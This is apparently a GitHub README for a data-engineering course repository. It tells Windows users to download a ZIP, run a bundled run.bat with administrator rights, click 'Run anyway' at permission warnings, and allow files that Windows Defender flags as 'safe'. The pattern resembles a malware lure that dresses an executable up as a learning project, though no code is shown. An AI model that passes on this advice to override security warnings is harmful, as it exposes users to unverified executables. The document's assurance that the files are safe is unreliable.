This software covers a big set of data engineering tools on AWS. It includes lessons and projects to help you learn SQL, PySpark, Kafka, Airflow, and Databricks. You will use over 20 AWS services such as Glue, Redshift, and Athena. The focus is to teach you step-by-step, from beginner to advanced skills.
The repository also offers 15 projects where you build real-world data pipelines. These projects use technologies like Delta Lake, Iceberg, and CI/CD (Continuous Integration and Continuous Delivery). This gives a practical edge to your learning.
Topics covered include airflow, aws, bigquery, cassandra, databricks, flink, gcp, github-actions, hadoop, hive, kafka, mongodb, python, snowflake, spark, and sql.
This README explains how to get the application running on a Windows computer.
Before installing, make sure your computer meets these minimum needs:
- Windows 10 or newer (64-bit recommended)
- 8 GB of RAM or more
- At least 10 GB free disk space
- Internet connection for downloading and updates
- Administrator rights on your PC
For better performance, closing other heavy programs while using this tool is a good idea.
You will download the app from the main project page on GitHub. You do not need to run or compile any code manually. It is ready to use once installed with the steps below.
Click the green button above or open this link in your web browser:
This page has the full project files and instructions.
Once on the GitHub page, find the "Code" button near the top right.
- Click the "Code" button.
- Select "Download ZIP" from the dropdown menu.
- Save the ZIP file to a folder you can find easily, such as your Desktop or Downloads.
Find the ZIP file you downloaded and extract it:
- Right-click the ZIP file.
- Select "Extract All..."
- Choose a location where you want the files to go, like your Documents folder.
- Click "Extract".
Open the extracted folder. Look for a file named run.bat or start.bat.
- Double-click this file to launch the program.
- If you see a warning about permissions, choose "Run anyway".
This file will start all necessary services and open a browser window for you to interact with the learning platform.
If this file is not present, open the folder and double-click on the file named README_FIRST.pdf or .txt for more precise instructions.
The application uses a web browser interface for all interactions. You will complete courses and projects inside your web browser.
When you run the run.bat file, it will start:
- A local server that gives you access to lessons and projects
- Tools like Airflow to schedule workflows
- Databricks-like environments for coding practice
- Connections to AWS services for cloud tasks simulation
You can open many parts of the curriculum and projects directly from your browser, without extra setups.
For some projects, you might want to install software like:
- AWS CLI to access real AWS services
- Python 3.8+ for running sample scripts
- Docker for containerized environments
This software works without them, but these tools can add more features if you want to expand.
- SQL Training: Learn how to write database queries.
- PySpark Labs: Practice big data processing with Spark.
- Kafka Workflows: Stream data between systems.
- Airflow Automation: Schedule tasks and data pipelines.
- Databricks Simulation: Try notebooks similar to the popular platform.
- AWS Services: Learn tools like Glue, Redshift, and Athena.
- Industrial Projects: Build from start to finish using modern technology.
- Version Control: Use GitHub for code management and tracking.
All features are designed to help you become familiar with the tools and platforms used in data engineering jobs today.
Inside the extracted folder, you will find:
curriculum/– Course materials and session notesprojects/– Industrial projects with full instructionsscripts/– Helper scripts for setup and running jobsconfigs/– Configuration files for AWS service simulationsdocs/– Additional documentation and guidesrun.bat– Main launcher file
Explore the folders to see the content before running the app if you want.
- Application does not start: Right-click
run.batand select "Run as Administrator". - Browser does not open automatically: Open your browser and visit http://localhost:8080
- Error messages about missing Python or Java: Install Python 3.8+ from python.org, and Java 8 or above from oracle.com
- Firewall blocks connection: Allow connection on port 8080 through your firewall settings.
- Windows Defender flags files: Allow the files after checking them, as these are safe scripts and executables from the project.
- Close other heavy programs to keep performance smooth.
- Use Google Chrome or Firefox for the best browser experience.
- Save your work often within the web platform.
- Read the project instructions carefully before starting.
- Use the folder structure to locate resources easily.
You can visit this page to download:
Or use the button at the top to go straight there.
Once downloaded and extracted, run run.bat to open the learning platform. Follow the in-browser instructions to start your data engineering journey.